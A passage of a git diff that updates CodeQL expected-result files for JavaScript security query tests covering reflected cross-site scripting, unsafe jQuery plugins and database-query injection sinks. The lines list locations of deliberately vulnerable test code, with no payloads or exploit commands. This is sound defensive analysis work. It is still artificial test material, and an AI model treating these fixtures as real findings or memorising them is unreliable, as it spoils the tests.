rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:7:33:7:45 | req.params.id | user-provided value | +| ReflectedXss.js:16:12:16:39 | "Unknow ... rams.id | ReflectedXss.js:16:31:16:39 | params.id | ReflectedXss.js:16:12:16:39 | "Unknow ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:16:31:16:39 | params.id | user-provided value | +| ReflectedXss.js:21:12:21:19 | req.body | ReflectedXss.js:21:12:21:19 | req.body | ReflectedXss.js:21:12:21:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:21:12:21:19 | req.body | user-provided value | +| ReflectedXss.js:22:12:22:27 | marked(req.body) | ReflectedXss.js:22:19:22:26 | req.body | ReflectedXss.js:22:12:22:27 | marked(req.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:22:19:22:26 | req.body | user-provided value | +| ReflectedXss.js:28:12:28:19 | req.body | ReflectedXss.js:28:12:28:19 | req.body | ReflectedXss.js:28:12:28:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:28:12:28:19 | req.body | user-provided value | +| ReflectedXss.js:40:12:40:19 | req.body | ReflectedXss.js:40:12:40:19 | req.body | ReflectedXss.js:40:12:40:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:40:12:40:19 | req.body | user-provided value | +| ReflectedXss.js:41:12:41:39 | convert ... q.body) | ReflectedXss.js:41:31:41:38 | req.body | ReflectedXss.js:41:12:41:39 | convert ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:41:31:41:38 | req.body | user-provided value | +| ReflectedXss.js:55:12:55:19 | req.body | ReflectedXss.js:55:12:55:19 | req.body | ReflectedXss.js:55:12:55:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:55:12:55:19 | req.body | user-provided value | +| ReflectedXss.js:64:16:64:19 | file | ReflectedXss.js:63:14:63:21 | req.body | ReflectedXss.js:64:16:64:19 | file | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:63:14:63:21 | req.body | user-provided value | +| ReflectedXss.js:67:12:67:52 | remark( ... tring() | ReflectedXss.js:67:33:67:40 | req.body | ReflectedXss.js:67:12:67:52 | remark( ... tring() | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:67:33:67:40 | req.body | user-provided value | +| ReflectedXss.js:71:12:71:65 | unified ... oString | ReflectedXss.js:71:48:71:55 | req.body | ReflectedXss.js:71:12:71:65 | unified ... oString | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:71:48:71:55 | req.body | user-provided value | +| ReflectedXss.js:74:14:74:14 | f | ReflectedXss.js:73:20:73:27 | req.body | ReflectedXss.js:74:14:74:14 | f | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:73:20:73:27 | req.body | user-provided value | +| ReflectedXss.js:82:12:82:19 | req.body | ReflectedXss.js:82:12:82:19 | req.body | ReflectedXss.js:82:12:82:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:82:12:82:19 | req.body | user-provided value | +| ReflectedXss.js:83:12:83:30 | snarkdown(req.body) | ReflectedXss.js:83:22:83:29 | req.body | ReflectedXss.js:83:12:83:30 | snarkdown(req.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:83:22:83:29 | req.body | user-provided value | +| ReflectedXss.js:84:12:84:31 | snarkdown2(req.body) | ReflectedXss.js:84:23:84:30 | req.body | ReflectedXss.js:84:12:84:31 | snarkdown2(req.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:84:23:84:30 | req.body | user-provided value | +| ReflectedXss.js:96:12:96:19 | req.body | ReflectedXss.js:96:12:96:19 | req.body | ReflectedXss.js:96:12:96:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:96:12:96:19 | req.body | user-provided value | +| ReflectedXss.js:97:12:97:38 | markdow ... q.body) | ReflectedXss.js:97:30:97:37 | req.body | ReflectedXss.js:97:12:97:38 | markdow ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:97:30:97:37 | req.body | user-provided value | +| ReflectedXss.js:99:12:99:39 | markdow ... q.body) | ReflectedXss.js:99:31:99:38 | req.body | ReflectedXss.js:99:12:99:39 | markdow ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:99:31:99:38 | req.body | user-provided value | +| ReflectedXss.js:102:12:102:84 | markdow ... q.body) | ReflectedXss.js:102:76:102:83 | req.body | ReflectedXss.js:102:12:102:84 | markdow ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:102:76:102:83 | req.body | user-provided value | +| ReflectedXss.js:109:16:109:30 | request.query.p | ReflectedXss.js:109:16:109:30 | request.query.p | ReflectedXss.js:109:16:109:30 | request.query.p | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:109:16:109:30 | request.query.p | user-provided value | +| ReflectedXss.js:121:30:121:73 | `${inva ... telist` | ReflectedXss.js:113:13:113:27 | keys: queryKeys | ReflectedXss.js:121:30:121:73 | `${inva ... telist` | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:113:13:113:27 | keys: queryKeys | user-provided value | +| ReflectedXss.js:121:30:121:73 | `${inva ... telist` | ReflectedXss.js:115:31:115:45 | paramKeys?.keys | ReflectedXss.js:121:30:121:73 | `${inva ... telist` | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:115:31:115:45 | paramKeys?.keys | user-provided value | | ReflectedXssContentTypes.js:10:14:10:36 | "FOO: " ... rams.id | ReflectedXssContentTypes.js:10:24:10:36 | req.params.id | ReflectedXssContentTypes.js:10:14:10:36 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXssContentTypes.js:10:24:10:36 | req.params.id | user-provided value | | ReflectedXssContentTypes.js:20:14:20:36 | "FOO: " ... rams.id | ReflectedXssContentTypes.js:20:24:20:36 | req.params.id | ReflectedXssContentTypes.js:20:14:20:36 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXssContentTypes.js:20:24:20:36 | req.params.id | user-provided value | | ReflectedXssContentTypes.js:39:13:39:35 | "FOO: " ... rams.id | ReflectedXssContentTypes.js:39:23:39:35 | req.params.id | ReflectedXssContentTypes.js:39:13:39:35 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXssContentTypes.js:39:23:39:35 | req.params.id | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssWithCustomSanitizer.expected b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssWithCustomSanitizer.expected index d29b35203b80..eae50c0243f9 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssWithCustomSanitizer.expected +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssWithCustomSanitizer.expected @@ -1,25 +1,25 @@ -| ReflectedXss.js:8:14:8:45 | "Unknow ... rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:8:33:8:45 | req.params.id | user-provided value | -| ReflectedXss.js:17:12:17:39 | "Unknow ... rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:17:31:17:39 | params.id | user-provided value | -| ReflectedXss.js:22:12:22:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:22:12:22:19 | req.body | user-provided value | -| ReflectedXss.js:23:12:23:27 | marked(req.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:23:19:23:26 | req.body | user-provided value | -| ReflectedXss.js:29:12:29:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:29:12:29:19 | req.body | user-provided value | -| ReflectedXss.js:41:12:41:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:41:12:41:19 | req.body | user-provided value | -| ReflectedXss.js:42:12:42:39 | convert ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:42:31:42:38 | req.body | user-provided value | -| ReflectedXss.js:56:12:56:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:56:12:56:19 | req.body | user-provided value | -| ReflectedXss.js:65:16:65:19 | file | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:64:14:64:21 | req.body | user-provided value | -| ReflectedXss.js:68:12:68:52 | remark( ... tring() | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:68:33:68:40 | req.body | user-provided value | -| ReflectedXss.js:72:12:72:65 | unified ... oString | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:72:48:72:55 | req.body | user-provided value | -| ReflectedXss.js:75:14:75:14 | f | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:74:20:74:27 | req.body | user-provided value | -| ReflectedXss.js:83:12:83:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:83:12:83:19 | req.body | user-provided value | -| ReflectedXss.js:84:12:84:30 | snarkdown(req.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:84:22:84:29 | req.body | user-provided value | -| ReflectedXss.js:85:12:85:31 | snarkdown2(req.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:85:23:85:30 | req.body | user-provided value | -| ReflectedXss.js:97:12:97:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:97:12:97:19 | req.body | user-provided value | -| ReflectedXss.js:98:12:98:38 | markdow ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:98:30:98:37 | req.body | user-provided value | -| ReflectedXss.js:100:12:100:39 | markdow ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:100:31:100:38 | req.body | user-provided value | -| ReflectedXss.js:103:12:103:84 | markdow ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:103:76:103:83 | req.body | user-provided value | -| ReflectedXss.js:110:16:110:30 | request.query.p | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:110:16:110:30 | request.query.p | user-provided value | -| ReflectedXss.js:122:30:122:73 | `${inva ... telist` | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:114:13:114:27 | keys: queryKeys | user-provided value | -| ReflectedXss.js:122:30:122:73 | `${inva ... telist` | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:116:31:116:45 | paramKeys?.keys | user-provided value | +| ReflectedXss.js:7:14:7:45 | "Unknow ... rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:7:33:7:45 | req.params.id | user-provided value | +| ReflectedXss.js:16:12:16:39 | "Unknow ... rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:16:31:16:39 | params.id | user-provided value | +| ReflectedXss.js:21:12:21:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:21:12:21:19 | req.body | user-provided value | +| ReflectedXss.js:22:12:22:27 | marked(req.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:22:19:22:26 | req.body | user-provided value | +| ReflectedXss.js:28:12:28:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:28:12:28:19 | req.body | user-provided value | +| ReflectedXss.js:40:12:40:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:40:12:40:19 | req.body | user-provided value | +| ReflectedXss.js:41:12:41:39 | convert ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:41:31:41:38 | req.body | user-provided value | +| ReflectedXss.js:55:12:55:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:55:12:55:19 | req.body | user-provided value | +| ReflectedXss.js:64:16:64:19 | file | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:63:14:63:21 | req.body | user-provided value | +| ReflectedXss.js:67:12:67:52 | remark( ... tring() | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:67:33:67:40 | req.body | user-provided value | +| ReflectedXss.js:71:12:71:65 | unified ... oString | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:71:48:71:55 | req.body | user-provided value | +| ReflectedXss.js:74:14:74:14 | f | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:73:20:73:27 | req.body | user-provided value | +| ReflectedXss.js:82:12:82:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:82:12:82:19 | req.body | user-provided value | +| ReflectedXss.js:83:12:83:30 | snarkdown(req.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:83:22:83:29 | req.body | user-provided value | +| ReflectedXss.js:84:12:84:31 | snarkdown2(req.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:84:23:84:30 | req.body | user-provided value | +| ReflectedXss.js:96:12:96:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:96:12:96:19 | req.body | user-provided value | +| ReflectedXss.js:97:12:97:38 | markdow ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:97:30:97:37 | req.body | user-provided value | +| ReflectedXss.js:99:12:99:39 | markdow ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:99:31:99:38 | req.body | user-provided value | +| ReflectedXss.js:102:12:102:84 | markdow ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:102:76:102:83 | req.body | user-provided value | +| ReflectedXss.js:109:16:109:30 | request.query.p | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:109:16:109:30 | request.query.p | user-provided value | +| ReflectedXss.js:121:30:121:73 | `${inva ... telist` | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:113:13:113:27 | keys: queryKeys | user-provided value | +| ReflectedXss.js:121:30:121:73 | `${inva ... telist` | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:115:31:115:45 | paramKeys?.keys | user-provided value | | ReflectedXssContentTypes.js:10:14:10:36 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXssContentTypes.js:10:24:10:36 | req.params.id | user-provided value | | ReflectedXssContentTypes.js:20:14:20:36 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXssContentTypes.js:20:24:20:36 | req.params.id | user-provided value | | ReflectedXssContentTypes.js:39:13:39:35 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXssContentTypes.js:39:23:39:35 | req.params.id | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/UnsafeJQueryPlugin.expected b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/UnsafeJQueryPlugin.expected index f246b00d7878..b17ab0564834 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/UnsafeJQueryPlugin.expected +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/UnsafeJQueryPlugin.expected @@ -169,17 +169,17 @@ subpaths | unsafe-jquery-plugin.js:48:6:48:11 | target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:48:6:48:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | | unsafe-jquery-plugin.js:52:6:52:11 | target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:52:6:52:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | | unsafe-jquery-plugin.js:60:6:60:11 | target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:60:6:60:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:68:45:68:63 | this.options.parent | unsafe-jquery-plugin.js:65:47:65:53 | options | unsafe-jquery-plugin.js:68:45:68:63 | this.options.parent | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:65:19:69:2 | functio ... T OK\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:72:5:72:23 | options.foo.bar.baz | unsafe-jquery-plugin.js:71:38:71:44 | options | unsafe-jquery-plugin.js:72:5:72:23 | options.foo.bar.baz | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:71:19:74:2 | functio ... / OK\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:77:17:77:35 | options.foo.bar.baz | unsafe-jquery-plugin.js:76:38:76:44 | options | unsafe-jquery-plugin.js:77:17:77:35 | options.foo.bar.baz | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:76:19:78:2 | functio ... T OK\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:68:45:68:63 | this.options.parent | unsafe-jquery-plugin.js:65:47:65:53 | options | unsafe-jquery-plugin.js:68:45:68:63 | this.options.parent | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:65:19:69:2 | functio ... lert\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:72:5:72:23 | options.foo.bar.baz | unsafe-jquery-plugin.js:71:38:71:44 | options | unsafe-jquery-plugin.js:72:5:72:23 | options.foo.bar.baz | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:71:19:74:2 | functio ... ml);\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:77:17:77:35 | options.foo.bar.baz | unsafe-jquery-plugin.js:76:38:76:44 | options | unsafe-jquery-plugin.js:77:17:77:35 | options.foo.bar.baz | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:76:19:78:2 | functio ... lert\\n\\t} | '$.fn.my_plugin' plugin | | unsafe-jquery-plugin.js:90:6:90:6 | t | unsafe-jquery-plugin.js:84:38:84:44 | options | unsafe-jquery-plugin.js:90:6:90:6 | t | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:84:19:93:2 | functio ... ns);\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:107:5:107:18 | options.target | unsafe-jquery-plugin.js:101:38:101:44 | options | unsafe-jquery-plugin.js:107:5:107:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:101:19:108:2 | functio ... T OK\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:117:5:117:18 | options.target | unsafe-jquery-plugin.js:114:38:114:44 | options | unsafe-jquery-plugin.js:117:5:117:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:114:19:118:2 | functio ... T OK\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:122:5:122:18 | options.target | unsafe-jquery-plugin.js:121:40:121:46 | options | unsafe-jquery-plugin.js:122:5:122:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:121:21:123:2 | functio ... T OK\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:127:6:127:19 | options.target | unsafe-jquery-plugin.js:126:33:126:39 | options | unsafe-jquery-plugin.js:127:6:127:19 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:126:14:128:3 | functio ... OK\\n\\t\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:132:5:132:18 | options.target | unsafe-jquery-plugin.js:131:34:131:40 | options | unsafe-jquery-plugin.js:132:5:132:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:131:15:133:2 | functio ... T OK\\n\\t} | '$.fn.affix' plugin | -| unsafe-jquery-plugin.js:136:5:136:29 | options ... elector | unsafe-jquery-plugin.js:135:36:135:42 | options | unsafe-jquery-plugin.js:136:5:136:29 | options ... elector | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:135:17:137:2 | functio ... T OK\\n\\t} | '$.fn.tooltip' plugin | -| unsafe-jquery-plugin.js:157:44:157:59 | options.target.a | unsafe-jquery-plugin.js:153:38:153:44 | options | unsafe-jquery-plugin.js:157:44:157:59 | options.target.a | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:153:19:158:2 | functio ... NCY]\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:107:5:107:18 | options.target | unsafe-jquery-plugin.js:101:38:101:44 | options | unsafe-jquery-plugin.js:107:5:107:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:101:19:108:2 | functio ... lert\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:117:5:117:18 | options.target | unsafe-jquery-plugin.js:114:38:114:44 | options | unsafe-jquery-plugin.js:117:5:117:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:114:19:118:2 | functio ... lert\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:122:5:122:18 | options.target | unsafe-jquery-plugin.js:121:40:121:46 | options | unsafe-jquery-plugin.js:122:5:122:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:121:21:123:2 | functio ... lert\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:127:6:127:19 | options.target | unsafe-jquery-plugin.js:126:33:126:39 | options | unsafe-jquery-plugin.js:127:6:127:19 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:126:14:128:3 | functio ... ert\\n\\t\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:132:5:132:18 | options.target | unsafe-jquery-plugin.js:131:34:131:40 | options | unsafe-jquery-plugin.js:132:5:132:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:131:15:133:2 | functio ... lert\\n\\t} | '$.fn.affix' plugin | +| unsafe-jquery-plugin.js:136:5:136:29 | options ... elector | unsafe-jquery-plugin.js:135:36:135:42 | options | unsafe-jquery-plugin.js:136:5:136:29 | options ... elector | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:135:17:137:2 | functio ... lert\\n\\t} | '$.fn.tooltip' plugin | +| unsafe-jquery-plugin.js:157:44:157:59 | options.target.a | unsafe-jquery-plugin.js:153:38:153:44 | options | unsafe-jquery-plugin.js:157:44:157:59 | options.target.a | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:153:19:158:2 | functio ... ties\\n\\t} | '$.fn.my_plugin' plugin | | unsafe-jquery-plugin.js:170:6:170:11 | target | unsafe-jquery-plugin.js:160:38:160:44 | options | unsafe-jquery-plugin.js:170:6:170:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:160:19:173:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:179:5:179:18 | options.target | unsafe-jquery-plugin.js:178:27:178:33 | options | unsafe-jquery-plugin.js:179:5:179:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:178:18:180:2 | functio ... T OK\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:179:5:179:18 | options.target | unsafe-jquery-plugin.js:178:27:178:33 | options | unsafe-jquery-plugin.js:179:5:179:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:178:18:180:2 | functio ... lert\\n\\t} | '$.fn.my_plugin' plugin | | unsafe-jquery-plugin.js:192:19:192:28 | options.of | unsafe-jquery-plugin.js:185:28:185:34 | options | unsafe-jquery-plugin.js:192:19:192:28 | options.of | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:185:18:194:2 | functio ... et);\\n\\t} | '$.fn.position' plugin | diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/DatabaseAccesses.expected b/javascript/ql/test/query-tests/Security/CWE-089/untyped/DatabaseAccesses.expected index 0f95e5464fb9..52ce3076ba70 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/DatabaseAccesses.expected +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/DatabaseAccesses.expected @@ -1,4 +1,4 @@ -| html-sanitizer.js:15:5:17:5 | connect ... K\\n ) | +| html-sanitizer.js:15:5:17:5 | connect ... t\\n ) | | json-schema-validator.js:27:13:27:27 | doc.find(query) | | json-schema-validator.js:30:13:30:27 | doc.find(query) | | json-schema-validator.js:33:13:33:27 | doc.find(query) | @@ -7,43 +7,43 @@ | json-schema-validator.js:55:13:55:27 | doc.find(query) | | json-schema-validator.js:59:13:59:27 | doc.find(query) | | json-schema-validator.js:61:13:61:27 | doc.find(query) | -| marsdb-flow-to.js:14:3:14:41 | db.myDo ... => {}) | -| marsdb.js:16:3:16:36 | doc.fin ... => {}) | -| minimongo.js:18:3:18:17 | doc.find(query) | -| mongodb.js:18:7:18:21 | doc.find(query) | -| mongodb.js:21:7:21:48 | doc.fin ... itle }) | -| mongodb.js:24:7:24:53 | doc.fin ... r(1) }) | -| mongodb.js:29:9:29:34 | doc.fin ... itle }) | -| mongodb.js:32:9:32:46 | doc.fin ... tle) }) | -| mongodb.js:43:7:43:21 | doc.find(query) | -| mongodb.js:54:7:54:21 | doc.find(query) | -| mongodb.js:65:3:65:17 | doc.find(query) | -| mongodb.js:73:5:77:27 | client\\n ... tag }) | -| mongodb.js:81:3:85:25 | importe ... tag }) | -| mongodb.js:98:5:98:19 | doc.find(query) | -| mongodb.js:112:5:112:19 | doc.find(query) | +| marsdb-flow-to.js:13:3:13:41 | db.myDo ... => {}) | +| marsdb.js:15:3:15:36 | doc.fin ... => {}) | +| minimongo.js:17:3:17:17 | doc.find(query) | +| mongodb.js:17:7:17:21 | doc.find(query) | +| mongodb.js:20:7:20:48 | doc.fin ... itle }) | +| mongodb.js:23:7:23:53 | doc.fin ... r(1) }) | +| mongodb.js:28:9:28:34 | doc.fin ... itle }) | +| mongodb.js:30:9:30:46 | doc.fin ... tle) }) | +| mongodb.js:41:7:41:21 | doc.find(query) | +| mongodb.js:51:7:51:21 | doc.find(query) | +| mongodb.js:61:3:61:17 | doc.find(query) | +| mongodb.js:69:5:72:27 | client\\n ... tag }) | +| mongodb.js:76:3:79:25 | importe ... tag }) | +| mongodb.js:92:5:92:19 | doc.find(query) | +| mongodb.js:105:5:105:19 | doc.find(query) | | mongodb_bodySafe.js:18:7:18:21 | doc.find(query) | -| mongodb_bodySafe.js:29:7:29:21 | doc.find(query) | -| mongoose.js:63:2:63:34 | Documen ... then(X) | -| mongoose.js:65:2:65:51 | Documen ... on(){}) | -| mongoose.js:67:2:68:27 | new Mon ... on(){}) | -| mongoose.js:71:2:78:9 | Documen ... .exec() | -| mongoose.js:85:2:85:52 | Documen ... query)) | -| mongoose.js:86:2:86:52 | Documen ... query)) | -| mongoose.js:87:2:87:57 | Documen ... query)) | -| mongoose.js:88:2:88:57 | Documen ... query)) | -| mongoose.js:89:2:89:52 | Documen ... query)) | -| mongoose.js:90:2:90:55 | Documen ... query)) | -| mongoose.js:92:2:92:52 | Documen ... query)) | -| mongoose.js:93:2:93:49 | Documen ... query)) | -| mongoose.js:94:2:94:57 | Documen ... query)) | -| mongoose.js:95:2:95:54 | Documen ... query)) | -| mongoose.js:96:2:96:52 | Documen ... query)) | -| mongoose.js:97:2:97:52 | Documen ... query)) | -| mongoose.js:99:2:99:50 | Documen ... query)) | -| mongoose.js:113:2:113:53 | Documen ... () { }) | -| mongoose.js:134:3:134:52 | Documen ... on(){}) | -| mongoose.js:136:3:136:52 | Documen ... on(){}) | +| mongodb_bodySafe.js:28:7:28:21 | doc.find(query) | +| mongoose.js:49:2:49:34 | Documen ... then(X) | +| mongoose.js:51:2:51:51 | Documen ... on(){}) | +| mongoose.js:53:2:54:27 | new Mon ... on(){}) | +| mongoose.js:57:2:64:9 | Documen ... .exec() | +| mongoose.js:71:2:71:52 | Documen ... query)) | +| mongoose.js:72:2:72:52 | Documen ... query)) | +| mongoose.js:73:2:73:57 | Documen ... query)) | +| mongoose.js:74:2:74:57 | Documen ... query)) | +| mongoose.js:75:2:75:52 | Documen ... query)) | +| mongoose.js:76:2:76:55 | Documen ... query)) | +| mongoose.js:78:2:78:52 | Documen ... query)) | +| mongoose.js:79:2:79:49 | Documen ... query)) | +| mongoose.js:80:2:80:57 | Documen ... query)) | +| mongoose.js:81:2:81:54 | Documen ... query)) | +| mongoose.js:82:2:82:52 | Documen ... query)) | +| mongoose.js:83:2:83:52 | Documen ... query)) | +| mongoose.js:85:2:85:50 | Documen ... query)) | +| mongoose.js:99:2:99:53 | Documen ... () { }) | +| mongoose.js:120:3:120:52 | Documen ... on(){}) | +| mongoose.js:122:3:122:52 | Documen ... on(){}) | | mysql.js:8:9:11:47 | connect ... ds) {}) | | mysql.js:14:9:16:47 | connect ... ds) {}) | | mysql.js:19:9:20:48 | connect ... ds) {}) | @@ -59,10 +59,10 @@ | pg-promise.js:17:3:17:21 | db.oneOrNone(query) | | pg-promise.js:18:3:18:17 | db.query(query) | | pg-promise.js:19:3:19:18 | db.result(query) | -| pg-promise.js:21:3:23:4 | db.one( ... OK\\n }) | -| pg-promise.js:24:3:27:4 | db.one( ... OK\\n }) | +| pg-promise.js:21:3:23:4 | db.one( ... rt\\n }) | +| pg-promise.js:24:3:27:4 | db.one( ... d,\\n }) | | pg-promise.js:28:3:31:4 | db.one( ... er\\n }) | -| pg-promise.js:32:3:35:4 | db.one( ... OK\\n }) | +| pg-promise.js:32:3:35:4 | db.one( ... rt\\n }) | | pg-promise.js:36:3:43:4 | db.one( ... ]\\n }) | | pg-promise.js:44:3:50:4 | db.one( ... }\\n }) | | pg-promise.js:51:3:58:4 | db.one( ... }\\n }) | @@ -88,7 +88,7 @@ | redis.js:49:18:49:47 | client. ... value") | | socketio.js:11:5:11:54 | db.run( ... ndle}`) | | tst2.js:7:3:7:62 | sql.que ... ms.id}` | -| tst2.js:9:3:9:85 | new sql ... + "'") | +| 